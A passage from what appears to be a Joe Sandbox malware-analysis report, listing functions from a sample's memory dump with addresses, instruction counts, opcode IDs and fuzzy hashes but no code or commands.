                                                                                                          • Instruction Fuzzy Hash: B811C272A00615ABDB61DF59C9C0B9FFBB8EF88750F900058DE41B7200D731AD41CB60
                                                                                                          Function 0104EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4d70e0000a8d12e73c8fb52ae538c84a30d736b7be68f4c8e74198219514dbdf
                                                                                                          • Instruction ID: 0e110a6b77e65a42b54ba65c62d2b2696c76ec6b33ea0621228cf421adc3df41
                                                                                                          • Opcode Fuzzy Hash: 4d70e0000a8d12e73c8fb52ae538c84a30d736b7be68f4c8e74198219514dbdf
                                                                                                          • Instruction Fuzzy Hash: E901D2B15001099FC769DF18D544F56FBFAFBC6314F2081BAE1448B264D774AC82CB90
                                                                                                          Function 0104E53E Relevance: .1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                          • Instruction ID: 9eababeff14b69faae34d9dbc0f395ecb2e7f2b35aecbc0530b4245dcf2f5015
                                                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                          • Instruction Fuzzy Hash: 671182B12096C29BE762B73CE998B697BD8FB41754F1904F0DAC1CB652F72CC842C290
                                                                                                          Function 010AE75D Relevance: .1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                          • Instruction ID: 21ad351fab1fe7bbd5fc3e714e98e7ec8030d4e5461013adfa88e0feaee789ff
                                                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                          • Instruction Fuzzy Hash: 3201F132600206AFE7219F98CC40F9EBFE9FF84B50F558064EA899B260E771DD40CB90
                                                                                                          Function 0101A250 Relevance: .1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                          • Instruction ID: aff863994952be2764b0a804322397ff0c6a1a3611367263b943d04414ab77d7
                                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                          • Instruction Fuzzy Hash: E9010471606761DBCB218F1D9840AAA7BE8EB55770B00856DF8D58B285C339D400CB60
                                                                                                          Function 0109E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1e44e6774a77ca46601dcddb1b97c76ad4d236cbfd42cfeda7487a696f4968b2
                                                                                                          • Instruction ID: 52d8081afb3c0a1da341e6eba3aec8918233e8d88a4e33fec494c15031ba502d
                                                                                                          • Opcode Fuzzy Hash: 1e44e6774a77ca46601dcddb1b97c76ad4d236cbfd42cfeda7487a696f4968b2
                                                                                                          • Instruction Fuzzy Hash: 9B11AD32241241EFDB26EF19CD90F56BBB8FF58B84F2000A5FA459B6A1C235ED01CA90
                                                                                                          Function 01026259 Relevance: .1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 763aee2a65ead51de05f4afa17b02d174ceb8e86385b58f1de9198eb632a0df3
                                                                                                          • Instruction ID: e3fb3fdf638f5ed289a9e5f8191838df3e1e664e563584f7b18884ea8c1bea61
                                                                                                          • Opcode Fuzzy Hash: 763aee2a65ead51de05f4afa17b02d174ceb8e86385b58f1de9198eb632a0df3
                                                                                                          • Instruction Fuzzy Hash: 5911AC70501228ABEB65EF64CD42FE9B3B8FF04710F5041D4A798AA0E0DB709E85CF84
                                                                                                          Function 010A6050 Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3f2840ef13173afb6aee6f7926d4946c7b78ef04e05a216577853da9e6aa4144
                                                                                                          • Instruction ID: 40aba570c1820d9b85275851f6743ba0ce552a817ee22427a53791eaaf7475d1
                                                                                                          • Opcode Fuzzy Hash: 3f2840ef13173afb6aee6f7926d4946c7b78ef04e05a216577853da9e6aa4144
                                                                                                          • Instruction Fuzzy Hash: 4B111772900119ABCB15DB94CC80DEFBBBCEF48258F044166A946A7211EA35EA55CBA0
                                                                                                          Function 0102208A Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                          • Instruction ID: 78476f0da99d345deca143a3eec4d75d728ac5465601419373127eb77c6e5bc7
                                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                          • Instruction Fuzzy Hash: 7F01F1326002218BEF519AA9D8C0AA677AABFC4700F1545E9FE958F247DA758C81C390
                                                                                                          Function 010B6500 Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f15096e40e8032478885d6ab6b46782800af7f1144dd9e6a9767acc77b6c2c96
                                                                                                          • Instruction ID: a11a0be3685bce7ef6d5e4d80d1cb2b1dfbb04f0fbe14a7347a1f24a41025088
                                                                                                          • Opcode Fuzzy Hash: f15096e40e8032478885d6ab6b46782800af7f1144dd9e6a9767acc77b6c2c96
                                                                                                          • Instruction Fuzzy Hash: BC11A1326441469FD711CF58D840BE6BBF9FB9A314F088199E8888B315D732EC81CBA0
                                                                                                          Function 010AC810 Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e37c7c9642ec51a424deecc7572cfc5baef0ba723c4800de95695f8adc861156
                                                                                                          • Instruction ID: 9a978c05dc4c9dc7f3888570a9f82d466e01d57a5c8ba14cf90639810e1ce1fd
                                                                                                          • Opcode Fuzzy Hash: e37c7c9642ec51a424deecc7572cfc5baef0ba723c4800de95695f8adc861156
                                                                                                          • Instruction Fuzzy Hash: 2D1118B1E002099BCB04DFA9D581AAEBBF8FF58250F10806AB905E7351D674EA018BA4
                                                                                                          Function 010CEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1ba28f865b5fff6a3faa9c8f8f123566ce3ce2a1c080fa722a9022d0e327e39
                                                                                                          • Instruction ID: 9253bc70555d3b0c27978ea6aacd5d139fcaa56bfeed3afca8505308abb96ea1
                                                                                                          • Opcode Fuzzy Hash: a1ba28f865b5fff6a3faa9c8f8f123566ce3ce2a1c080fa722a9022d0e327e39
                                                                                                          • Instruction Fuzzy Hash: 1701B1321402119FCB36AF1DC54096EBFE9FF91A60B14846EE1D55B651CB31AC41CF91
                                                                                                          Function 0101C020 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                          • Instruction ID: 2b2ab4248952c898931669dd4b606051610483be3d69ff5a081b91aab78ce365
                                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                          • Instruction Fuzzy Hash: 870128326007459FEB6396A9D940EA777E9FFC6210F044859AAC68B940DA74E401CB60
                                                                                                          Function 010620F0 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7a55eab3f3af44eb41f394b9348265e7038d6d2861236b2f9bd6be4a414bd28e
                                                                                                          • Instruction ID: c7b342ccb9496271350579de2c11a1fa7f12137bf9b7859b143908202c553e89
                                                                                                          • Opcode Fuzzy Hash: 7a55eab3f3af44eb41f394b9348265e7038d6d2861236b2f9bd6be4a414bd28e
                                                                                                          • Instruction Fuzzy Hash: A2116D75A0020DEBDF05EFA4D850AAE7BB9EB54380F004059E9519B250D635AE11CB90
                                                                                                          Function 0105E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9ae28c9de0835ca12951abdbc972593de2ca428e3f3a8bbc6cf1d71ad9c59d3c
                                                                                                          • Instruction ID: 8678e049032441a26e7d1de500f2531e0bc028606710ab1102a06a4a97cbf7b6
                                                                                                          • Opcode Fuzzy Hash: 9ae28c9de0835ca12951abdbc972593de2ca428e3f3a8bbc6cf1d71ad9c59d3c
                                                                                                          • Instruction Fuzzy Hash: 6B01A2B2201A06BFD711AB7ACD80E97BBACFFD86A4B000679B54587551DB74FC11C6E0
                                                                                                          Function 010B69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2d0b85694b76bb3318d59017dfc98559db72c3999ff15a890d5468d22e8be9fa
                                                                                                          • Instruction ID: e763d6ba96ff27b825549406ac2aa2f9c4805a2f8b4f6c190bbcd73ebae4f7a1
                                                                                                          • Opcode Fuzzy Hash: 2d0b85694b76bb3318d59017dfc98559db72c3999ff15a890d5468d22e8be9fa
                                                                                                          • Instruction Fuzzy Hash: 69014C322242069BC720DF69D8C89EBFBECFF89620F104129E99887280E7319901CBD1
                                                                                                          Function 010AC460 Relevance: .0, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1736fc2aa3483774001e24dc5ce9788a50f1e9fa29bf8afc393427aa0e56ddb
                                                                                                          • Instruction ID: 8edb491239fc5e2a9fa0a72fa42e6e3c287c3cb6609c29e4a5b25eb09f0d4ba2
                                                                                                          • Opcode Fuzzy Hash: a1736fc2aa3483774001e24dc5ce9788a50f1e9fa29bf8afc393427aa0e56ddb
                                                                                                          • Instruction Fuzzy Hash: 9E115B75A0020DABDF15EFA8D944EEEBBB9FB48250F004059B94197340DA35ED11CB94
                                                                                                          Function 010AC97C Relevance: .0, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69196aa70006549ea36f582c3504d3f658dbfeb1d51aeb1085eaf698cd02dc40
                                                                                                          • Instruction ID: 40d85e7f3daba164b1b264d8ced13ebd8f1efc969be925a2c26cf390d8702445
                                                                                                          • Opcode Fuzzy Hash: 69196aa70006549ea36f582c3504d3f658dbfeb1d51aeb1085eaf698cd02dc40
                                                                                                          • Instruction Fuzzy Hash: 981179B16183089FC700DF69D54599BBBF8EF98310F00891AB998D7390E630E900CB92
                                                                                                          Function 010ACA11 Relevance: .0, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7abb6267dbb2b2df4f65eea5fbc36724c3ae63a94c4ef3708ea4fb0966c32594
                                                                                                          • Instruction ID: 149f31deff066cc13928e2d3b49ad866a582195671f153cc197c4fc771c1cf00
                                                                                                          • Opcode Fuzzy Hash: 7abb6267dbb2b2df4f65eea5fbc36724c3ae63a94c4ef3708ea4fb0966c32594
                                                                                                          • Instruction Fuzzy Hash: 3E1179B16183089FC300DF69D54199BBBF8FF99350F00891AB998D73A0E630E900CB92
                                                                                                          Function 010F4A80 Relevance: .0, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                          • Instruction ID: 5bd1030ad12a324cb4fed6e681e3cdc90eb67020b6f57aab08bffd01694638be
                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                          • Instruction Fuzzy Hash: 3801D832200A059FD7219A59D845F97B7EAFBC5210F04485DEB82CBA50DA70F844C754
                                                                                                          Function 0103E016 Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                          • Instruction ID: dc07f280f4c8dbeb71876a393b214dff5a2325607d435818c43aaea97fbcf0ae
                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                          • Instruction Fuzzy Hash: DA01DF322005809FE322871DCA48F2ABBDCEF84764F0944E1FA85CB691C638DC80CA25
                                                                                                          Function 0101826B Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3408817a2b80f362aa8791b95b1367fb41d89f198cbdbc223615854c0a15d42
                                                                                                          • Instruction ID: 1cdf804d8601bca0305070abe006db6484278efe5b5040e4f515f14e717d9ddb
                                                                                                          • Opcode Fuzzy Hash: e3408817a2b80f362aa8791b95b1367fb41d89f198cbdbc223615854c0a15d42
                                                                                                          • Instruction Fuzzy Hash: 3F01D432B105099BD719DBA9D9009EEBBE8EF40220F45806ADA41E7648DE30DA01C290
                                                                                                          Function 010CEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 9b4fd74bfcc621492ae04588df892edf145e8083dcc9c407bb5bb636b960a344
                                                                                                          • Instruction ID: 49e0adebdc1baf7a05878fdbbf9e07baa55bf88db0321b7424c6952490ab8f77
                                                                                                          • Opcode Fuzzy Hash: 9b4fd74bfcc621492ae04588df892edf145e8083dcc9c407bb5bb636b960a344
                                                                                                          • Instruction Fuzzy Hash: FA01DF71240A01AFD3355B59D900B5ABAA8AF54F60F14443EF2969B394C7B1A8818B64
                                                                                                          Function 01022582 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5ac1ee38e05f1a92f7a59e6a6bce8b7758910ee37fcefd9097a80df471ebd7ad
                                                                                                          • Instruction ID: 7ca3903fb9a5bcc1a4a494d7654fb85fe52df126171c5ed3be271a8a0e326875
                                                                                                          • Opcode Fuzzy Hash: 5ac1ee38e05f1a92f7a59e6a6bce8b7758910ee37fcefd9097a80df471ebd7ad
                                                                                                          • Instruction Fuzzy Hash: 8AF0A432A41B35B7C7319B9A8D40F57BAAEEBC4B90F158029E6459B650DA34ED01CBA0
                                                                                                          Function 0104C073 Relevance: .0, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                          • Instruction ID: 871e547cb0e4ab2bbea2cfef2c3efb7b7a66849250a3329ec145bd8d4fe110f4
                                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                          • Instruction Fuzzy Hash: 7FF0AFB2600611ABE328CF4D9D40E57FBEEDBD5A80F048168A545C7220EA31DD04CB90
                                                                                                          Function 0101C310 Relevance: .0, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                          • Instruction ID: 1eee7d893b992b9549c690b9878c1fd40c4b6bc51398c0113194ebfb6136cdb2
                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                          • Instruction Fuzzy Hash: 57F02B33284A339BF736165D4940B6FAAD99FD1B64F1A4035F2899B64CCA6CCD0297D0
                                                                                                          Function 0105CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                          • Instruction ID: 6f63c4274ab44ff94f268a4ee00f56a1c9f087af0dbcc603f092a98afb384f7b
                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                          • Instruction Fuzzy Hash: BA01D6312006899BE762965DD909B9BBFDCEF42754F0884A6FE848F791DA79C800C210
                                                                                                          Function 010F61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd1fc1935cde2d9c570bdbd589785c54d060c1d6e0a8d6322dd97611dc22e17a
                                                                                                          • Instruction ID: 1ec5e1ecbec365aef007dceb64d9d05b3bacd0239a779c1d5d208035a67563f8
                                                                                                          • Opcode Fuzzy Hash: cd1fc1935cde2d9c570bdbd589785c54d060c1d6e0a8d6322dd97611dc22e17a
                                                                                                          • Instruction Fuzzy Hash: 00018F71A006499BDB04DFA9E445AEEBBF8BF58310F14405AF540EB380D738EA01CB94
                                                                                                          Function 010A63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                          • Instruction ID: ba4ae13015e031867259cee68cc0f7570c11dba9dfb39a621cd35c58a67d23b4
                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                          • Instruction Fuzzy Hash: 13F01D7220001DBFEF019F94DD80DEF7B7EEB59298B144125FA1196160D636DD21ABA0
                                                                                                          Function 010AA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d46ebf89ad09737b7b84db40af0470fd2ed9b4ad3cfa6ae24f3d0804e42657b
                                                                                                          • Instruction ID: 3ea0e462c31963bdc1a1c1909319efff27d41b2ae667751d1e3999b6cdcd30c8
                                                                                                          • Opcode Fuzzy Hash: 9d46ebf89ad09737b7b84db40af0470fd2ed9b4ad3cfa6ae24f3d0804e42657b
